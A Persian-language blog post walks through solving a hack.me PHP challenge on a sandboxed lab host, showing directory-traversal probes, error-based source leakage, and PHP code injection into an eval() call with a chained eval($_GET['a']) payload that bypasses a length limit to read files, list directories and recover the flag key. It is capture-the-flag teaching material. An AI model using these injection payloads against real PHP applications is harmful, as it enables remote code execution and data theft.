YShahinzadeh
YShahinzadeh
خواندن ۲ دقیقه·۷ سال پیش

حل چالش امنیتی https://hack.me

با سلام، سایت http://hack.me یک سایت وابسته به شرکت امنیتی eLearnSecurity می‌باشد که انشالله در پستی جداگانه این شرکت را خدمت شما معرفی خواهم کرد. در این سایت،‌ چالش‌های زیادی با سختی‌های مختلف وجود دارد. حل یکی از این چالش‌ها را برای این پست در نظر گرفته‌ام. پیش از آنکه وارد جزئیات مربوط به حل این پیکار شویم، پیشنهاد می‌کنم نگاهی به سوال بیندازید:

https://hack.me/102100/restrictions-bypass-php.html

خوب با ورود به پیکار، صفحه HTML ای به کاربر نمایش داده می‌شود، با کلیک بر روی تنها لینک صفحه،‌ کاربر به صفحه download.php منتقل می‌شود:

http://s30085-102100-6pv.sipontum.hack.me/download.php?file=files/read_me.txt

این صفحه ورودی با نام file دریافت می‌کند. به نظر شما اولین تستی که در این مرحله باید انجام شود چیست؟ با توجه به URL می‌توان حدس زد که download.php ورودی فایل را دریافت کرده و محتوای آن را نمایش می‌دهد. برای مثال چنین سورسی قابل پیشبینی است:

<?php $file = $_GET['file'] ... ... some checking ... echo file_get_contents($directory . $file); ?>

وجود لینک زیر نیز مهر تائیدی است بر اینکه directory$ خالی می‌باشد.

http://s30085-102100-6pv.sipontum.hack.me/files/read_me.txt

در اولین مرحله باید آزمون Directory Traversal انجام پذیرد:

http://s30085-102100-6pv.sipontum.hack.me/download.php?file=files/../files/read_me.txt

لینک بالا منجر به باز شدن فایل read_me.txt می‌شود پس می‌توان نتیجه گرفت که آسیب‌پذیری Directory Traversal نیز موجود است. پس لینک زیر باید منجر به بارگزاری فایل index.php شود:

http://s30085-102100-6pv.sipontum.hack.me/download.php?file=../index.php

اما جواب دریافتی Not the right way است. همچنین:

http://s30085-102100-6pv.sipontum.hack.me/download.php?file=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

مشخص می‌کند که با توجه به پیغام File name too long. محدودیت طول در ورودی file وجود دارد. فرستادن درخواست زیر:

http://s30085-102100-6pv.sipontum.hack.me/download.php?file[]=files/read_me.txt

سرور جواب زیر را می‌دهد:

Warning: strlen() expects parameter 1 to be string, array given in C:\inetpub\wwwroot\coliseum\client\sandbox\30085-102100\BODY\inner\download.php on line 8 Warning: basename() expects parameter 1 to be string, array given in C:\inetpub\wwwroot\coliseum\client\sandbox\30085-102100\BODY\inner\download.php on line 11 Warning: strpos() expects parameter 1 to be string, array given in C:\inetpub\wwwroot\coliseum\client\sandbox\30085-102100\BODY\inner\download.php on line 13 Not the right way.

منجر به افشای جزئیاتی راجع به سورس پرونده download.php می‌شود:

  1. محدودیت طولی چک می‌شود
  2. اسم فایل با تابع basename مشخص می‌گردد
  3. تابع strpos به دنبال رشته‌ای خاص در اسم فایل می‌گردد

با بررسی‌های به‌عمل آمده مخشص گردید که عدم موجود عبارت about_me در ورودی فایل منجر به ایجاد خطا می‌شود. با انجام فازینگ بر روی ورودی فایل:

http://s30085-102100-6pv.sipontum.hack.me/download.php?file=files/read_me.txt%27

و جواب سرور:

Warning: readfile(files/read_me.txt') [function.readfile]: failed to open stream: No such file or directory in C:\inetpub\wwwroot\coliseum\client\sandbox\30085-102100\BODY\inner\download.php on line 18 Parse error: syntax error, unexpected T_ENCAPSED_AND_WHITESPACE in C:\inetpub\wwwroot\coliseum\client\sandbox\30085-102100\BODY\inner\download.php(21) : eval()'d code on line 1

تابع eval مشخص می‌کنم که ورودی file در دو تابع readfile و eval قرار می‌گیرد. سورس پیشبینی شده برای eval به‌صورت زیر است:

<?php eval("PHPCODE...function('$file')...PHPCODE"); ?>

به‌دلیل اینکه کوتیش تزریق شده منجر به break شدن رشته شده (عدم وجود تابع escape کننده برای رشته ورودی) که این امر منجر به امکان تغییر کد PHP در تابع eval می‌باشد. شرایطی که باید برای تزریق کد برقرار باشد:

  1. وجود رشته about_me
  2. طول محدود رشته ورودی file
  3. تزریق کد به گونه‌ای که syntax کد درست باشد

برای محقق شدن مورد سوم، کافی است تعداد کافی پرانتز را برای بستن توابع موجود در eval به کار برد:

http://s30085-102100-6pv.sipontum.hack.me/download.php?file=/read_me&amp;amp;#x27;);print(&amp;amp;#x27;voorivex&amp;amp;#x27;);print(&amp;amp;#x27;

لینک بالا مجر به اجرا شدن تکه کدهای PHP و در نتیجه چاپ voorivex می‌شود. حال برای خواندن سایر صفحات، نیاز به دور زدن محدودیت طول ودودی فایل می‌باشد، برای این امر کافی است ورودی دیگری در کد تعریف کرده، و آن به را تابع eval دیگری ارجاع دهیم تا محدودیت طول برداشته شود:

http://s30085-102100-6pv.sipontum.hack.me/download.php?file=/read_me&amp;amp;#x27;);eval($_GET[&amp;amp;#x27;a&amp;amp;#x27;]);print(&amp;amp;#x27;&amp;amp;amp;a=echo &amp;amp;#x27;voorivex&amp;amp;#x27;;

حال تمامی کدهای تزریق شده بدون وجود محدودیت طول در سمت سرور اجرا می‌شود.

با خواندن دو صفحه اصلی و گرفتن لیست از پوشه اصلی، پیکار به راحتی حل می‌شود:

http://s30085-102100-6pv.sipontum.hack.me/download.php?file=/read_me&amp;amp;#x27;);eval($_GET[&amp;amp;#x27;a&amp;amp;#x27;]);print(&amp;amp;#x27;&amp;amp;amp;a=var_dump(file_get_contents(&amp;amp;#x27;flag.php&amp;amp;#x27;));

<?php if(isset($_POST['genflag'])) { $name = @$_POST['name']; $key = @$_POST['key']; if(!$key || !$name) exit("<br /><br />Error! Key or name cannot be empty."); if(strpos($key,base64_decode("NjcyOTY0OTg3N2E1NDI4M2YxZDgxYmEwOTRkOWJmYWM=")) !== false) exit("<br /><br />Error! This is NOT the required key.<br />But you going in the right direction... Keep moving."); //don't try to crack the hash to find solution - this is not the valid solution //and you will fail miserably, as the key is long enough if(md5($key) !== "0c3933bb1a3d63c356d2f7e2606bd794") exit("<br /><br />Error! This is NOT the required key. Try again."); $hashedKey = md5(md5($name.$key)); $flag = base64_encode($name.":".$hashedKey); echo "<br /><br />Your flag is: " . $flag; echo "<br />You can submit this now."; } ?>

http://s30085-102100-6pv.sipontum.hack.me/download.php?file=/read_me&amp;amp;#x27;);eval($_GET[&amp;amp;#x27;a&amp;amp;#x27;]);print(&amp;amp;#x27;&amp;amp;amp;a=var_dump(file_get_contents(&amp;amp;#x27;download.php&amp;amp;#x27;));

<?php //well done, you have successfully completed the first step! //Just one more step to capture the flag... Good luck. $file = @$_GET['file']; if(strlen($file) > 50) exit("File name too long."); $fileName = basename($file); if(!strpos($file, "read_me")){ exit("Not the right way."); } echo "<pre>"; readfile($file); echo "</pre>"; eval("fwrite(fopen('stats/stats.txt','a'),'$fileName');"); ?>"

http://s30085-102100-6pv.sipontum.hack.me/download.php?file=/read_me&amp;amp;#x27;);eval($_GET[&amp;amp;#x27;a&amp;amp;#x27;]);print(&amp;amp;#x27;&amp;amp;amp;a=var_dump(scandir(&amp;amp;#x27;.&amp;amp;#x27;));

Array ( [0] => . [1] => .. [2] => 6729649877a54283f1d81ba094d9bfac.key [3] => download.php [4] => files [5] => flag.php [6] => index.php [7] => stats )

و در نهایت:

http:/s30085-102100-6pv.sipontum.hack.me/download.php?file=/read_me&amp;amp;#x27;);eval($_GET[&amp;amp;#x27;a&amp;amp;#x27;]);print(&amp;amp;#x27;&amp;amp;amp;a=var_dump(file_get_contents(&amp;amp;#x27;6729649877a54283f1d81ba094d9bfac.key&amp;amp;#x27;));

که منجر به افشای کلید شده:

Congratulations! Your key is: dzNsbGQwbmUuLi4hIQ==

با وارد کردن کلید و اسم خود در صفحه flag.php، پیکار به اتمام می‌رسد.

پیکار امنیتیامنیت اطلاعاتآزمون نفوذپنتست
یاشار شاهین‌زاده - وقت کنم فارسی می‌نویسم.
شاید از این پست‌ها خوشتان بیاید